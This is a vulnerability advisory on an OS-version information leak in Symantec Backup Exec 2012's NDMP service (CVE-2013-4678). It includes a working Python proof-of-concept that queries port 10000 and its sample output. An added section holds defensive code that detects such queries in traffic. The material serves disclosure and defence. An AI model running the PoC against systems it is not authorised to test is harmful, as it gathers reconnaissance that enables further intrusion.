Symantec Backup Exec 2012 – OS version and service pack information leak

Summary

Name: Symantec Backup Exec 2012 – OS version and service pack information leak
Release Date: 2 October 2013
Reference: NGS00344
Discoverer: Andy Davis
Vendor: Symantec
CVE Reference: CVE-2013-4678
Systems Affected: Symantec Backup Exec 2012
Risk: Medium
Status: Published

TimeLine

Discovered: 18 July 2012
Released: 18 July 2012
Approved: 18 July 2012
Reported: 18 July 2012
Fixed: 1 August 2013
Published: 30 September 2013

Description

The NDMP protocol leaks version information about the underlying OS that
Backup Exec is installed upon. This information could be useful to an
attacker who is trying to exploit another service on the server where
OS version information is specifically required (this is often the case
with memory corruption bugs).

Technical Details

NDMP (Network Data Management Protocol) is an open standard protocol for
enterprise-wide backup of heterogeneous network-attached storage. It
listens on TCP port 10000.

The PoC below demonstrates the information leak.

C:\>ndmp.py 10.33.33.141

--------------------------
Backup Exec NDMP info leak
--------------------------

WIN2K3-R2-ENT
Windows NTMajor Version=5 Minor Version=2 Build Number=3790 ServicePack
Major=2 ServicePack Minor=0 SuiteMask=274 ProductType=3 ProcessorType=Intel x8610.33.33.141

#!/usr/local/bin/python

import sys
from socket import *
import os
import time

if (len(sys.argv)!=2):
    print "\n--------------------------"
    print "Symantec Backup Exec NDMP info leak"
    print "Andy Davis, NCC Group 2013"
    print "Usage: ndmp.py <target IP>"
    print "--------------------------\n"
    exit(0)

host=sys.argv[1]
port=10000

# Three NDMP requests, each prefixed with a 4-byte record mark:
# CONFIG_GET_AUTH_ATTR, CONNECT_CLIENT_AUTH (user "root") and CONFIG_GET_HOST_INFO
data = ['\x80\x00\x00\x1c\x00\x00\x00\x01D\xa4\xde\x07\x00\x00\x00\x00\x00\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02',
        '\x80\x00\x004\x00\x00\x00\x02D\xa4\xde\x07\x00\x00\x00\x00\x00\x00\t\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04root}(\xe5n\xcd\x1bk\xae\xd6\xe8\x1cpu\xcc\x9d\xa4',
        '\x80\x00\x00\x18\x00\x00\x00\x03D\xa4\xde.\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00']

output = ""

print "\n--------------------------"
print "Backup Exec NDMP info leak"
print "--------------------------\n"

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))

x = 0
while (x < len(data)):

    time.sleep(0.01)
    try:
        s.send(data[x])
    except:
        print "failed to send"
        pass

    time.sleep(0.01)
    try:
        out = s.recv(1024)
        if x == 2:
            # Reply to the third request: keep only printable characters and line breaks
            y = 35
            while y < len(out):
                if ord(out[y]) > 31 and ord(out[y]) < 127 or ord(out[y]) == 10 or ord(out[y]) == 13:
                    output += out[y]
                y+=1
    except:
        pass
        print "failed to receive"
    x+=1

print output

s.close()
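
For detection, the requests the PoC sends can be recognised on the wire. The following is an added example (not part of the original advisory): it decodes the record mark and 24-byte NDMP header of each message in a captured client-to-server stream and reports CONFIG_GET_HOST_INFO requests. The header layout and message codes come from the NDMP specification; SAMPLE, parse_ndmp and host_info_requests are names invented here, and each message is assumed to arrive as a single fragment.

```python
import struct

# NDMP message codes from the protocol specification (only those the PoC uses).
NDMP_MESSAGES = {
    0x0100: "CONFIG_GET_HOST_INFO",
    0x0103: "CONFIG_GET_AUTH_ATTR",
    0x0901: "CONNECT_CLIENT_AUTH",
}
# 24-byte header: sequence, time_stamp, message_type, message, reply_sequence, error
HEADER = struct.Struct(">6I")

# Constructed sample: client-to-server bytes modelled on the PoC's three requests,
# with the 16-byte digest in the second message zeroed.
SAMPLE = bytes.fromhex(
    "8000001c" "00000001" "44a4de07" "00000000" "00000103" "00000000" "00000000"
    "00000002"
    "80000034" "00000002" "44a4de07" "00000000" "00000901" "00000000" "00000000"
    "00000002" "00000004" "726f6f74" + "00" * 16 +
    "80000018" "00000003" "44a4de2e" "00000000" "00000100" "00000000" "00000000"
)


def parse_ndmp(stream):
    """Split a TCP payload into NDMP messages and decode each header."""
    messages, pos = [], 0
    while pos + 4 <= len(stream):
        (mark,) = struct.unpack_from(">I", stream, pos)
        length = mark & 0x7FFFFFFF          # low 31 bits: fragment length
        frag = stream[pos + 4:pos + 4 + length]
        if len(frag) < length or length < HEADER.size:
            break                           # truncated capture or not NDMP
        seq, _ts, mtype, code, _reply_seq, err = HEADER.unpack_from(frag)
        messages.append({
            "sequence": seq,
            "is_reply": mtype == 1,         # 0 = request, 1 = reply
            "message": NDMP_MESSAGES.get(code, hex(code)),
            "error": err,
            "body": frag[HEADER.size:],
        })
        pos += 4 + length
    return messages


def host_info_requests(stream):
    """Sequence numbers of requests asking the server for host/OS details."""
    return [m["sequence"] for m in parse_ndmp(stream)
            if not m["is_reply"] and m["message"] == "CONFIG_GET_HOST_INFO"]
```

Run over the payload of traffic to TCP port 10000, host_info_requests highlights sessions that query host information, which can then be compared against the list of expected backup servers.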

Fix Information

http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20130801_00

 
